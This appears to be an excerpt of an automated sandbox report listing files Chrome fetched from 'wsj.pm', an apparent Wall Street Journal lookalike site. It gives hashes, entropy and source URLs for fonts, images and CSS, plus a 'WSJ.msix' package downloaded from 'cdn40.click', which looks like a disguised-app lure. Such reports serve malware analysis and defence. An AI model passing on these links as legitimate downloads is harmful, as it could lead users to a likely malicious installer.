                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M37.4,3.5c0,0.8-0.2,1.5-0.7,2c-0.6,0.6-1.3,0.9-2.2,0.9c-0.9,0-1.6-0.3-2.2-0.9c-0.6-0.6-0.9-1.3-0.9-2.2 c0-0.9,0.3-1.6,0.9-2.2c0.6-0.6,1.3-0.9,2.2-0.9c0.4,0,0.8,0.1,1.2,0.3c0.4,0.2,0.7,0.4,0.9,0.7l-0.5,0.5c-0.4-0.5-0.9-0.7-1.6-0.7 c-0.6,0-1.2,0.2-1.6,0.7c-0.5,0.4-0.7,1-0.7,1.7s0.2,1.3,0.7,1.7c0.5,0.4,1,0.7,1.6,0.7c0.7,0,1.2-0.2,1.7-0.7 c0.3-0.3,0.5-0.7,0.5-1.2h-2.2V3h2.9C37.4,3.2,37.4,3.3,37.4,3.5z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M42.1,1h-2.7v1.9h2.5v0.7h-2.5v1.9h2.7v0.7h-3.5v-6h3.5V1z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M45.3,6.2h-0.8V1h-1.7V0.2H47V1h-1.7V6.2z"/><path fill="#FFFFFF" stroke
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1242
                                                                                                                Entropy (8bit):7.4848919715140045
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:Ac1spbhZ4RGxaXBsY6V4bXmLMnPUHiciVhEj0Sx6TxARdG8RG5wnq:AiWbhZ4XBsY6ubXHnPdVe4SwcrRGeq
                                                                                                                MD5:B5CA97D2473416E6EF6EDDEE47097DFB
                                                                                                                SHA1:59C7EA9475797CC44A9494C678C9435DA0082047
                                                                                                                SHA-256:F760308F9CA7561891609C963C8B8FF8C5B2F2B8CD6D188406CBF3F073AD870E
                                                                                                                SHA-512:94A64386DEE8EC33EA261C6557D9F0358B62C5D3F9C613EFD1986E806F786889B0544CC4F5631806C1077FD1C224527D492613A07B1A5E390EBCB31DD97FC517
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 48832, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):48832
                                                                                                                Entropy (8bit):7.995249280045157
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:kJiOFV1ZnQ1Y/jOA6bl34GCWmr+Mwfg3vUI3swNgHyNVBrh12ZP2bJwgvAE:0j1ZnQ1A6B34GCerfg3viONzh1GWJBb
                                                                                                                MD5:1E2CBA1400E0FEA01E7634DC03F91399
                                                                                                                SHA1:4098B4BA6731AEAAA11DA69057C7743D6A34EC46
                                                                                                                SHA-256:B79B2CF11707054066850EE05DE2F625D9914558836D3065C20E7F9776440FF6
                                                                                                                SHA-512:FE2D3B1C66BFED1448AA9EB0D81A9248E8262D8432858285891DC25EDD7836550327F5F97B83353B76E09EA21EE59A2EAF19976ADD11BEBF0FE3AFBD3FB8C91E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Bold.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5464
                                                                                                                Entropy (8bit):4.339733741196928
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 287 x 192, 8-bit/color RGB, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8645
                                                                                                                Entropy (8bit):7.940666975298049
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949675.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 66893, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):66893
                                                                                                                Entropy (8bit):7.996324109247098
                                                                                                                Encrypted:true
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-BookItalic.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47072, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47072
                                                                                                                Entropy (8bit):7.995146345063551
                                                                                                                Encrypted:true
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/Retina-Light.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3217
                                                                                                                Entropy (8bit):7.863271626454483
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47236, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47236
                                                                                                                Entropy (8bit):7.994813615656073
                                                                                                                Encrypted:true
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Medium.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5464
                                                                                                                Entropy (8bit):4.339733741196928
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/appstore.a6e93ba3.svg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 110 x 62, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):21892
                                                                                                                Entropy (8bit):7.981012051227347
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 607x341, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):38551
                                                                                                                Entropy (8bit):7.979559483689766
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949345.jpeg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7486
                                                                                                                Entropy (8bit):3.973611253013339
                                                                                                                Encrypted:false
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (10136)
                                                                                                                Category:dropped
                                                                                                                Size (bytes):17451
                                                                                                                Entropy (8bit):3.960425343726998
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:HszuKfFN6U8g+Onp/dZmILsiSiW2BQw/+Pb:09igp/d9LsiSiWSQw/+j
                                                                                                                MD5:E653DFCA7923DB2DFE35853484ECC138
                                                                                                                SHA1:1087A774BA6A833BED54D98399F7DEC44DEC1773
                                                                                                                SHA-256:AFCEEFD395BE95BD1B05D50C99964F1DAA86E78A9A0F9F70E43C52FA4E8D5F0A
                                                                                                                SHA-512:B562A786C59888FA71334A1D6776FBDD36782E921FCACC78EDA00C62095B8991081E05A84B9F462A9AEA1FE25E2107B359A37A023B668B77E2BE8A8A3B10E683
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.<svg width="243" height="46" viewBox="0 0 243 46" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M6.71975 19.4684C6.71975 20.4248 6.99201 20.6092 7.59774 20.7642L8.53604 20.9803V21.4124H2.30052V20.9803L3.08761 20.7959C3.69289 20.6418 3.9656 20.3321 3.9656 19.4693V0.771088H3.29957C1.42297 0.771088 0.666033 3.88753 0.454073 7.18884H0V0.154579H10.6849V7.18884H10.2308C10.0189 3.88798 9.26238 0.77154 7.38578 0.77154H6.71975V19.4684ZM11.3509 20.9803L12.017 20.795C12.6227 20.6409 12.895 20.3321 12.895 19.4684V2.06738C12.895 1.20319 12.6227 0.925668 12.017 0.771088L11.3509 0.586226V0.154127H17.2534V0.586226L16.5573 0.771088C15.9821 0.925668 15.6491 1.17245 15.6491 2.0362V10.1507H20.22V2.0362C20.22 1.17245 19.887 0.925668 19.3118 0.771088L18.6157 0.586226V0.154127H24.5182V0.586226L23.8521 0.771088C23.2473 0.925668 22.9746 1.20319 22.9746 2.06738V19.4377C22.9746 20.3014 23.2473 20.6418 23.8521 20.7959L24.5182 20.9803V21.4124H18.6157V20.9803L19.3
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 26844, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):26844
                                                                                                                Entropy (8bit):7.992687527027362
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:CVATMh4C6ITUDSflBxHkUvMrLppC0EpjjpPPW1HmLPIT1:Z46IA0KUI/KpfpPPW1GLQp
                                                                                                                MD5:7C442E963B2FB63C4CB6FCAD8ABDE902
                                                                                                                SHA1:6E88DBE0E0B6303EE8D3E0D802C6C78B0881FDF3
                                                                                                                SHA-256:38A583DE4C9A85114EA0D3811417028BD25CA29B2EED3F84372822C527D01CA6
                                                                                                                SHA-512:A2927E82B4D4EFEBACED2EBE887CBB86D86D11D60CC09A0EE403E71427E88520DE21F29DF10B62ACB3DD9FBE807084E0D09C21CB04C405976EE706AA48588C21
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 607x341, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):38551
                                                                                                                Entropy (8bit):7.979559483689766
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:JPQ5/bM/HsJ+HetU0E4Dz4zZw6EviDpXHEY7lcTiLv3GxoSd:qdM/HBHb0BwzWkXhS1oSd
                                                                                                                MD5:BF043F855257231B6776BF56794262D4
                                                                                                                SHA1:E3AD924760F763E0CE14815DE2B3DB188AC9B90E
                                                                                                                SHA-256:6BBD3CA87E32C7470CC5FD07008263C37AC861593476B27C91F603B213C7D4EE
                                                                                                                SHA-512:CE32B3EA7C5EB4F9D411A48FB0FDAC0F8FCD06C9C4DE3341BBB4CBF39D4F847AA84F63B6843C2CEB588C08F81B9E1248D32451FCAC9892D6F17BB8E8398BF2D3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1210
                                                                                                                Entropy (8bit):7.381102766358324
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:+CYj6LAgvJxg+H1wwVmQSlAUo4SucgBld+6SK5q6kVBLiMUFyScKR5oI:+CYjwAgvzH1rV0CUvdcGlduzP0M0cKYI
                                                                                                                MD5:D2923FC69E3F374E06D4F50DA50B9588
                                                                                                                SHA1:062E7805B2F479B3CE10DE870C185B60C58EEF79
                                                                                                                SHA-256:327DA69A811D3DDF7DA0754BE37A4A91262E65708519FE0B715EEB7747F3F58F
                                                                                                                SHA-512:7E186CAE0D7A84E3BD6D0FA4D8C78F295BF6748F90E764A6A9C4F367B7DF472095999B5F7A03FF2B8DF0F251E45A65A8E3808F845842992AD9849D132C70DC58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-44291453.avif
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 25736, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):25736
                                                                                                                Entropy (8bit):7.992849589657931
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:bLIzxVL45YpJobGGxt68MAfX/1g+vU4k4M:bk9oKG368MAXSIi4M
                                                                                                                MD5:10EA31224C1480796A64D3DC474588D8
                                                                                                                SHA1:053641303CD88AAEC9F34E8B137267E43DC0A348
                                                                                                                SHA-256:30F50C27FB65C2F79BDA64A7F209FD8AF7ABACE857ADE7DC29E9539587ACE1A2
                                                                                                                SHA-512:6857C93A6ECC7C8EDE9EEE7E765CB335E407B9EDFC1DDD1C69D98FFA140046F5729C6C6A76FCEF74E12944F45CAF59033483FAE94BED0D3DA56014C9674B0BB4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1210
                                                                                                                Entropy (8bit):7.381102766358324
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:+CYj6LAgvJxg+H1wwVmQSlAUo4SucgBld+6SK5q6kVBLiMUFyScKR5oI:+CYjwAgvzH1rV0CUvdcGlduzP0M0cKYI
                                                                                                                MD5:D2923FC69E3F374E06D4F50DA50B9588
                                                                                                                SHA1:062E7805B2F479B3CE10DE870C185B60C58EEF79
                                                                                                                SHA-256:327DA69A811D3DDF7DA0754BE37A4A91262E65708519FE0B715EEB7747F3F58F
                                                                                                                SHA-512:7E186CAE0D7A84E3BD6D0FA4D8C78F295BF6748F90E764A6A9C4F367B7DF472095999B5F7A03FF2B8DF0F251E45A65A8E3808F845842992AD9849D132C70DC58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 65365, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):65365
                                                                                                                Entropy (8bit):7.996210704160027
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:1536:NOkoTMONJ7wus/agckJcFxITg1UfpirF4BlnAMnUljbh:EVp8TWxD1+SqBJAM03h
                                                                                                                MD5:A2F3390FA1439393209FDBF0864BFBFB
                                                                                                                SHA1:C2F90D7D0D54E44F363D3555B93799DDB370E834
                                                                                                                SHA-256:5B3DAFB879AA963CC146639ED50803BB8496968027F35DBA28D1E39D0B5ED17D
                                                                                                                SHA-512:7FD791D7791550DED285EED55DF71C02DEAC57151BD8407F6B76DBB9363F0BB780178BE98259617D50B5D705BA7F371BD8D84DFDBF25951E04C67A4AB17BE49F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-Medium.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 25824, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):25824
                                                                                                                Entropy (8bit):7.9912445479427365
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:y/pNKuZLrymEgrWrs90sx+lEAd7aHSQBBXRo:yjKuJVWrs90llE0eBlS
                                                                                                                MD5:F8B4DAB12479D584FF82A1BDEEEE1D1B
                                                                                                                SHA1:4413D1B9DEFB607CDCDEA6F680E2EF5A9FBE3358
                                                                                                                SHA-256:0BFDA38967E02F468ABCB39F9EE8C1A0EAB48B2A2BE819E76FD313C71E1CC94C
                                                                                                                SHA-512:33032DEB7557772B1F7D4A02A7E98B673F6EF67D2EE4F32E54CD3D93B41B1F6D870B10FC3D61B1988A18AB66456D63DBDFCE5CA396CFEE0AB92AA75DCDBD04F6
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 1200 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):36753
                                                                                                                Entropy (8bit):7.374539144572274
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:WOXKOv1yZpYze15pC9Nnf+1DR+h0xBbZtc9/:WOaOd6Yze1y9Nf+1xK9/
                                                                                                                MD5:39C4A819D34BBC735A64925F6E1B822D
                                                                                                                SHA1:A070B426420A4D71E84EB299F72E2F3EB7CBE2CC
                                                                                                                SHA-256:19F65DAC376257F32E6B3FAF13AFFDB09811F1313B163CE42BD5ABED2BEF3199
                                                                                                                SHA-512:ACD6783EB06EA5EE37A4A0F9675D905D1DE80C59CAA459C185C7164F46D76553ABDA6A329DB827D0CB4FE8D6BF0FBC6F074B9377ED19086447BFA016C4DC5BB4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (1425), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):13726
                                                                                                                Entropy (8bit):5.611491041250947
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:vGSWFaMz1uzqb0Dy7cv5dbM8+qr4EI3qHlBALQDRnru1ALQDWnc1/3JoWlWAlMlN:IBeB3DRru13DWc1+LB
                                                                                                                MD5:A792E59D415507F73E161C261512ADF6
                                                                                                                SHA1:77D3292488CD60736256176DCBBED884D588E619
                                                                                                                SHA-256:85E59CB38B4073BBA5EC33B54F07ADB286350E0E8FA8995F16A21E030F83DB4C
                                                                                                                SHA-512:C48E91DFC95D2601977136AA5096EF7CA83E9DBDF857EC5BFD337EB1697EDD3D2D73C925D52835C7710003CC39B8EBAE2625C902A11355DA491200D9492D57BD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/css/footer.css
                                                                                                                Preview:.style--wsj-footer--1oyfjaSE {.. font-family:Retina.. }.. .style--wsj-footer--1oyfjaSE a:active,.. .style--wsj-footer--1oyfjaSE a:link,.. .style--wsj-footer--1oyfjaSE a:visited {.. color:inherit;.. text-decoration:none;.. outline:none.. }.. .style--wsj-footer--1oyfjaSE a:focus {.. outline:3px solid #0080c3;.. outline-offset:1px.. }.. .style--footer-wrap--2MWbl7sj {.. clear:left;.. background-color:#f4f4f4.. }.. .style--footer-wrap--2MWbl7sj a:hover {.. color:#0274b6.. }.. .style--sector--3YqTinLu {.. margin:0 auto;.. width:1280px.. }.. .style--at12units--1cWlUKQI .style--sector--3YqTinLu {.. width:980px.. }.. .style--module--1TyrWODD {.. margin-left:10px;.. margin-right:10px;.. clear:both;.. box-sizing:border-box.. }.. .style--top-links-wrapper--7aZFm8Cx {.. background-color:#e9e9e9;.. margin-bottom:30px.. }.. .style--top-links--1KnY_aIi {.. height:72px;.. position:relative;.. list-st
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 89a, 76 x 76
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7274
                                                                                                                Entropy (8bit):7.394845254952242
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:fdOBkA2/1guZ78IWA6ZPZBS+kQZI7kMaAawJUY6bG:lOl81gl1jTkQWraTY6bG
                                                                                                                MD5:43189FBE5F3EE308149EF9DD02964D9C
                                                                                                                SHA1:DCE4DF89C1B390631D4775A81BD5591119CEE5F9
                                                                                                                SHA-256:8A3D83FE1D0E6F9E14607C7C5B9A880EE18825B475A8F5D29A284BAE6D2E963E
                                                                                                                SHA-512:4BA264CC41F71E853CDC7646649269B7D7E470F50DE28F2C8473B2FB0CDD9CC977044AD9C229DE1D4161C0FCB817293DFA7E4866D0E178E1D3CDE0742080B39D
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 287x191, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9586
                                                                                                                Entropy (8bit):7.955142632385518
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nQPdQF3ztHakymnpTHy4BpC7DFvuP6Aq5bhyqIrokvFWHM7BW8:UgzymnpTSiC3FvuPGbhLILFoQf
                                                                                                                MD5:25CE6FA9798693A805D126956321CA82
                                                                                                                SHA1:3D1DDAE0DE494326B82E7056B371277630AB3634
                                                                                                                SHA-256:6D14CAE3C1B8D3710C1774DA1130CDE2EFC6DF295525A01BA81259583648CFF8
                                                                                                                SHA-512:0AD60AA52ABAC239A6874BD16298243A668DEF78C3E8005CDAE043D3AD56DA0086687380F1D92F8C900711223AE0DC7B6770695A6B4F670BE7F714369439F825
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 46896, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):46896
                                                                                                                Entropy (8bit):7.994954897293629
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:7K2xVr44pmE48HYe4rhCILHDiigJXh7DoVJILHcz3UcgXH2MzhhmIZJLC0zv4aJ4:hxVr44pW8HetCILe9XhQJMc7UcgXzzhg
                                                                                                                MD5:24C68AC27C209DA5C83D10B3038C17AF
                                                                                                                SHA1:F0EA85E0E6567A6A4DF2628B535A92580D2F1324
                                                                                                                SHA-256:2AD4A9B9E1D7BDA32834AF951EADBE33F30183272A09C596FEBF458D07CFA916
                                                                                                                SHA-512:7FCF5100FC3010388EC5C2900022711A3C3C184AE599AFC80F40A806ADA851730CC0B5710FF9B6B5C492CE22E5FC921AF8A7151420E03CD8D4AC1360D77D4762
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Light.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5009
                                                                                                                Entropy (8bit):6.7032773169417945
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:+VjvLQDTvsvBy9nUKUvuoN0CkdpNT0D5MdtbZPAVwzVw5tlCe7Uis3:+VzUsvynUKUv/feYNMtKwSXCe75W
                                                                                                                MD5:AC8211D8A19B370C97FAF7FA4FF7EFB4
                                                                                                                SHA1:D51E894AA80FF13D861664EE9FD86D4FEA58A782
                                                                                                                SHA-256:121E7ECAF100E40B30944EA2D3A88F24AAD67C9647D4B7BF50657378E52816A6
                                                                                                                SHA-512:7054F6C140BEEF680FEF0CFECC18BFDDD7145A8ABBE0EDDE7EB71CBE22B9233F6E104A19679A82AB005E8EC7BB768F07217D126E02B3EEE8CD026353C7A52521
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-647221.avif
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cdn40.click/files/WSJ.msix
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1242
                                                                                                                Entropy (8bit):7.4848919715140045
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:Ac1spbhZ4RGxaXBsY6V4bXmLMnPUHiciVhEj0Sx6TxARdG8RG5wnq:AiWbhZ4XBsY6ubXHnPdVe4SwcrRGeq
                                                                                                                MD5:B5CA97D2473416E6EF6EDDEE47097DFB
                                                                                                                SHA1:59C7EA9475797CC44A9494C678C9435DA0082047
                                                                                                                SHA-256:F760308F9CA7561891609C963C8B8FF8C5B2F2B8CD6D188406CBF3F073AD870E
                                                                                                                SHA-512:94A64386DEE8EC33EA261C6557D9F0358B62C5D3F9C613EFD1986E806F786889B0544CC4F5631806C1077FD1C224527D492613A07B1A5E390EBCB31DD97FC517
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949723.jpeg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):16
                                                                                                                Entropy (8bit):3.75
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Hs4Y:4
                                                                                                                MD5:4724E1B6CD4C657C054FC279728B9389
                                                                                                                SHA1:0E1E1FF0C77E475561A572AF7E2793925194C522
                                                                                                                SHA-256:FC027A34917AA7438F757F2A17E424A2A763C1077FA56A9C5BBA4CD6AEA25CB0
                                                                                                                SHA-512:5740C4C3E186CDCF22FD4E997A9082BC09184764E5ECB9808A0E495CBE6A0819FA9FD104E5D0F221995CBCE8205B0492AA6131F5D8D04E38B64C3CB9F55F6A30
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAmn8WJRrNvrzBIFDTBKud0=?alt=proto
                                                                                                                Preview:CgkKBw0wSrndGgA=
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 63957, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):63957
                                                                                                                Entropy (8bit):7.996533386595805
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:1536:Ot/Zd0fvjdoPYu6zjtT7Ix+Wgf2jybmRAN0/nwNeg7/eycoDUHZ:cdYvjdMkW/mSRa0/Wea+5
                                                                                                                MD5:0C40A7AE21908C50DAB61BA01D106DEB
                                                                                                                SHA1:6FF46C025B40CFB0DA10E874C55636DAFA7A48CE
                                                                                                                SHA-256:3A760AD2462E5115EFB1336E598DD00A47072606DEDBDB0BB0F75747529228F7
                                                                                                                SHA-512:5A09ACF82365820946B1758AA02B13425A0885912B08433830D2EEC2939BFFB79D2F63581E6DE9E20A7EB2CA4B156325AF5C9EC9553E4FC232115411A073ACFB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-Book.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5009
                                                                                                                Entropy (8bit):6.7032773169417945
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:+VjvLQDTvsvBy9nUKUvuoN0CkdpNT0D5MdtbZPAVwzVw5tlCe7Uis3:+VzUsvynUKUv/feYNMtKwSXCe75W
                                                                                                                MD5:AC8211D8A19B370C97FAF7FA4FF7EFB4
                                                                                                                SHA1:D51E894AA80FF13D861664EE9FD86D4FEA58A782
                                                                                                                SHA-256:121E7ECAF100E40B30944EA2D3A88F24AAD67C9647D4B7BF50657378E52816A6
                                                                                                                SHA-512:7054F6C140BEEF680FEF0CFECC18BFDDD7145A8ABBE0EDDE7EB71CBE22B9233F6E104A19679A82AB005E8EC7BB768F07217D126E02B3EEE8CD026353C7A52521
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):50600
                                                                                                                Entropy (8bit):7.982273521260046
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:D22uLgbSATuk1CQuaS9Ow15EmS82+fk5IqImN5mPv01K:D22uLgbgksQuaNGEmHgdImNbo
